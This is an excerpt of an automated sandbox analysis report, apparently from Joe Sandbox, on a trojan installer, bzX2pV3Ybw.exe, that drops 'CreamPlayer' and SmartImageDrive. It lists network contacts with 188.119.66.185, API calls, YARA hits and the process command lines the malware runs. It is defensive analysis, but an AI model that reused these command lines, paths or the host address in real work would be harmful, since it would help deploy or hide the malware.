                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.9:49844 version: TLS 1.2
                    Source: is-FFG28.tmp.2.drBinary or memory string: DirectDrawCreateExmemstr_ee9eaafe-4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0042F520 NtdllDefWindowProc_A,2_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00423B84 NtdllDefWindowProc_A,2_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004125D8 NtdllDefWindowProc_A,2_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00478AC0 NtdllDefWindowProc_A,2_2_00478AC0
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,2_2_00457594
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,2_2_0042E934
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555E4
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004706A82_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004809F72_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004352C82_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004673A42_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0043DD502_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0043035C2_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004444C82_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004345C42_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00444A702_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00486BD02_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00430EE82_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0045F0C42_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004451682_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0045B1742_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004694042_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004455742_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004519BC2_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00487B302_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0048DF542_2_0048DF54
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_004010005_2_00401000
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_004067075_2_00406707
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609660FA5_2_609660FA
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6092114F5_2_6092114F
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6091F2C95_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096923E5_2_6096923E
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6093323D5_2_6093323D
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6095C3145_2_6095C314
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609503125_2_60950312
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094D33B5_2_6094D33B
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6093B3685_2_6093B368
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096748C5_2_6096748C
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6093F42E5_2_6093F42E
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609544705_2_60954470
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609615FA5_2_609615FA
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096A5EE5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096D6A45_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609606A85_2_609606A8
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609326545_2_60932654
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609556655_2_60955665
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094B7DB5_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6092F74D5_2_6092F74D
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609648075_2_60964807
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094E9BC5_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609379295_2_60937929
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6093FAD65_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096DAE85_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094DA3A5_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60936B275_2_60936B27
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60954CF65_2_60954CF6
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60950C6B5_2_60950C6B
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60966DF15_2_60966DF1
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60963D355_2_60963D35
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60909E9C5_2_60909E9C
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60951E865_2_60951E86
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60912E0B5_2_60912E0B
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60954FF85_2_60954FF8
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D5BAED5_2_02D5BAED
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D62A705_2_02D62A70
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D5D31F5_2_02D5D31F
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D570B05_2_02D570B0
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D4E06F5_2_02D4E06F
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D6266D5_2_02D6266D
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D5BF055_2_02D5BF05
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D5873A5_2_02D5873A
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D5B5F95_2_02D5B5F9
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D60DA45_2_02D60DA4
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\SmartImageDrive\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 00457F1C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 00457D10 appears 96 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 00403494 appears 83 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 00403684 appears 225 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 00453344 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: String function: 004460A4 appears 59 times
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: String function: 02D62A00 appears 136 times
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: String function: 02D57750 appears 32 times
                    Source: bzX2pV3Ybw.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: bzX2pV3Ybw.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: bzX2pV3Ybw.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-9AR6U.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-9AR6U.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-9AR6U.tmp.2.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.5.drStatic PE information: Number of sections : 19 > 10
                    Source: is-S3M63.tmp.2.drStatic PE information: Number of sections : 19 > 10
                    Source: bzX2pV3Ybw.exe, 00000000.00000003.1353293615.0000000002278000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs bzX2pV3Ybw.exe
                    Source: bzX2pV3Ybw.exe, 00000000.00000003.1353116104.00000000025A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs bzX2pV3Ybw.exe
                    Source: bzX2pV3Ybw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal96.troj.evad.winEXE@10/30@0/2
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D4F8C0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,5_2_02D4F8C0
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,2_2_00455E0C
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: CloseServiceHandle,CreateServiceA,CloseServiceHandle,5_2_00401E0F
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0046E0E4 GetVersion,CoCreateInstance,2_2_0046E0E4
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_00401724 StartServiceCtrlDispatcherA,5_2_00401724
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_00401724 StartServiceCtrlDispatcherA,5_2_00401724
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_004017FE StartServiceCtrlDispatcherA,5_2_004017FE
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_00401FB6 ExitProcess,StartServiceCtrlDispatcherA,5_2_00401FB6
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeFile created: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmpJump to behavior
                    Source: Yara matchFile source: 5.0.creamplayer_x32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2615859333.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.1369381246.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-JIRG1.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\SmartImageDrive\SmartImageDrive.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: creamplayer_x32.exe, creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: creamplayer_x32.exe, creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: creamplayer_x32.exe, creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: bzX2pV3Ybw.exeReversingLabs: Detection: 21%
                    Source: bzX2pV3Ybw.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: bzX2pV3Ybw.exeString found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeFile read: C:\Users\user\Desktop\bzX2pV3Ybw.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\bzX2pV3Ybw.exe "C:\Users\user\Desktop\bzX2pV3Ybw.exe"
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp "C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp" /SL5="$103F2,3847834,56832,C:\Users\user\Desktop\bzX2pV3Ybw.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause cream_player_12135
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess created: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe "C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe" -i
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause cream_player_12135
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp "C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp" /SL5="$103F2,3847834,56832,C:\Users\user\Desktop\bzX2pV3Ybw.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause cream_player_12135Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess created: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe "C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe" -iJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause cream_player_12135Jump to behavior
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeSection loaded: apphelp.dllJump to behavior
